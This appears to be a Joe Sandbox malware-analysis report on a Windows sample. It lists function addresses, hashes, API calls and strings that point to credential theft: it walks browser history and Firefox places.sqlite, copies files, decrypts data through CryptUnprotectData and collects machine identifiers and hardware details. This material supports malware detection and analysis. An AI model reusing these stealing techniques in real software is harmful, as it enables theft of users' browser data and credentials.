Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D

Function 00406E68 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5

Function 00406E6C Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65

Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Function 004065E8 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753

Function 004065EC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647

Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Function 004011E4 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48

Non-executed Functions

Function 00413F58 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 496fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A212), ref: 00414115

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Strings

._., xrefs: 004143AD
.LNK, xrefs: 004142D8
8?A, xrefs: 0041402A, 004140D0, 004145D9, 0041473C
T_@, xrefs: 0041470B, 00414721

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$8?A$T_@
API String ID: 1653790112-814392791
Opcode ID: 31d205d8936ed6a38841222a8d26b5fdb0abdb355bc219240a33d41e848b65df
Instruction ID: ccf2d574420f699031c81d78e58b697f7985245bee10ad08c344e755ebce9b4b
Opcode Fuzzy Hash: 31d205d8936ed6a38841222a8d26b5fdb0abdb355bc219240a33d41e848b65df
Instruction Fuzzy Hash: C2223F74A0011E9BDB10EF55C985ADEB7B9EF84308F1081B7E504B7291DB38AF868F59

Function 00415E40 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 00415E88
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 00415EA4
GetRAM: , xrefs: 00415F2F
CPU Model: , xrefs: 00415E7A
CPU Count: , xrefs: 00415EEB
Video Info, xrefs: 00415F52

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: a830d23d120f7b9ebe103f2a948a2eedfedda67d2e02658d048cf10135b33262
Instruction ID: 196081fafed7d9336189c07f5dab181bd8ca6178f74fa25acf8eb9a608d7e1b8
Opcode Fuzzy Hash: a830d23d120f7b9ebe103f2a948a2eedfedda67d2e02658d048cf10135b33262
Instruction Fuzzy Hash: C541F274A00108ABCB01EFD1D842FCDBBB9EF48305F91813BF504B7296D679EA468B59

Function 00412D6C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FD4,?,00000000,?,00000000,?,00413361,00000000,00000000,00413B6D,?,00000000,00000024), ref: 00412E0B
FindNextFileW.KERNEL32(?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F5D
FindClose.KERNEL32(?,?,?,0041C91C,00412FFC,?,00412FFC,0041A212,00000000,?,00000000,00412FD4,?,00000000,?,00000000), ref: 00412F6E

Part of subcall function 00412974: GetTickCount.KERNEL32 ref: 004129B8
Part of subcall function 00412974: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34

Strings

.txt, xrefs: 00412F0C
\History, xrefs: 00412EA2
\*.*, xrefs: 00412DF2

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*$\History
API String ID: 3908936366-2232271174
Opcode ID: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
Instruction ID: b8b382f9890bf67c4ce716ca2eff32e8703a5b333aba7ace94e6d5da5dd104b6
Opcode Fuzzy Hash: 2a1da71cf4f321e8de6e9cdad0ec5a278b95c9ebbcb772d71ff5e323f66530a5
Instruction Fuzzy Hash: 14514C749042199BCF50EF61CD89ACDBBB8FB48304F5041FAA108B3291DB789F959F14

Function 00413030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,0041328E,?,00000000,?,00000000,?,00413A53,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004130CF
FindNextFileW.KERNEL32(?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413217
FindClose.KERNEL32(?,?,?,0041C80C,004132B8,?,004132B8,0041A212,00000000,?,00000000,0041328E,?,00000000,?,00000000), ref: 00413228

Part of subcall function 0041253C: GetTickCount.KERNEL32 ref: 00412580
Part of subcall function 0041253C: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC

Strings

\places.sqlite, xrefs: 0041315C
.txt, xrefs: 004131C6
\*.*, xrefs: 004130B6

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*$\places.sqlite
API String ID: 3908936366-3919338718
Opcode ID: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
Instruction ID: db2ad4c0925ffecf13339862ae006cc807f871b19183d5a4da560477eb916681
Opcode Fuzzy Hash: a040b60dfd4019a5a45722e27576c59aa6b8ef46a9cb7f8d1a2c5635a72954e7
Instruction Fuzzy Hash: 50512E749042199FCF50EF62CC89ACDBBB9EB48305F5041FAA508B3251DB399F858F18

Function 00404C71 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404CD7
GetVersion.KERNEL32 ref: 00404CEB
GetVersion.KERNEL32 ref: 00404CFC
GetCurrentThreadId.KERNEL32 ref: 00404D38

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404D18

Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE

Function 0041160C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053,00000000,00000000,00000000,?,00411CBE,00000000,00000000), ref: 00411678

Part of subcall function 004112D0: GetTickCount.KERNEL32 ref: 00411315
Part of subcall function 004112D0: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

FindNextFileW.KERNEL32(?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000,00000053), ref: 004118B1
FindClose.KERNEL32(?,?,?,0041C91C,00411988,?,00411988,0041A212,00000000,?,00000000,0041195E,?,00000000,?,00000000), ref: 004118C2

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

.txt, xrefs: 00411780, 00411860
\*.*, xrefs: 0041165F

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
Instruction ID: 5d1a81ccab342788691620b24a62b0bf455cea36908fa984f2d283373c0e855c
Opcode Fuzzy Hash: b7cd697545d2fa5f0459fee9811f7de309a2d0ba5142d04c105a288026d75c75
Instruction Fuzzy Hash: 40813C7490011DAFCF11EB51CC56BDDB779EF44304F6081EAA218B62A1DB399F858F58

Function 004119A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB

Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48

Strings

.txt, xrefs: 00411B49
\*.*, xrefs: 00411A32

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*
API String ID: 3908936366-2615687548
Opcode ID: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
Instruction ID: bf64687dc2ad86eb18c2fbcd59d677e1e6eaf9ec35dfa69074ee7f3f85d2a588
Opcode Fuzzy Hash: a356d1aef104fc62a0d83e0f23b15265d56114936feeb0c962a9a187a5f7b3d1
Instruction Fuzzy Hash: 25514B749052199FCF61EF61CD85ACDBBB8EB48304F5081FAA508B32A1DB389F858F54

Function 004119AC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

FindFirstFileW.KERNEL32(00000000,?,00000000,00411C11,?,00000000,?,00000000,?,004123C4,00000000,00000000,004123CE,?,00000000,00000000), ref: 00411A4B
FindNextFileW.KERNEL32(?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411B9A
FindClose.KERNEL32(?,?,?,0041C80C,00411C38,?,00411C38,0041A212,00000000,?,00000000,00411C11,?,00000000,?,00000000), ref: 00411BAB

Part of subcall function 00410D88: GetTickCount.KERNEL32 ref: 00410DCC
Part of subcall function 00410D88: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48

Strings

.txt, xrefs: 00411B49
\*.*, xrefs: 00411A32

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: FileFind$AllocCloseCopyCountFirstNextStringTick
String ID: .txt$\*.*
API String ID: 3908936366-2615687548
Opcode ID: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
Instruction ID: 460237bab6dc973d40a851033a2d7f34c10cc3b5c211c467e1e524dd2a58d6ff
Opcode Fuzzy Hash: b15686dc8056511c22f6009974073d3ef52242b41c6c0f73cd0f87596a77949b
Instruction Fuzzy Hash: E9511C749052199FCF61EF61CD89ACDBBB9EB48304F5081FAA508B3261DB389F858F54

Function 0040A610 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A631
LocalFree.KERNEL32(?), ref: 0040A656

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
Instruction ID: 789b43464e992449ae21f91847352ccfea11bbcfb58c617e1741a13a3b8d6e83
Opcode Fuzzy Hash: fa74fd686d8bb1450554d7fdbc3acb5fa010225d01e5a33861605ec384d54b81
Instruction Fuzzy Hash: 85F0BEB1344300ABD310EE69CC82B4BB7E8AB84700F14893E7698EB2D1D639E955875A

Function 00404BA8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
Instruction ID: 4cf5545a5668d2b6934dff5f8e722f533bd1fe9dd63670d657e80fcd03084d14
Opcode Fuzzy Hash: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
Instruction Fuzzy Hash: 77F0C870A0420DAFE715DF91CD41ADEF77AF7C5714F50883AA610772D0E7B86A00C698

Function 0040965C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
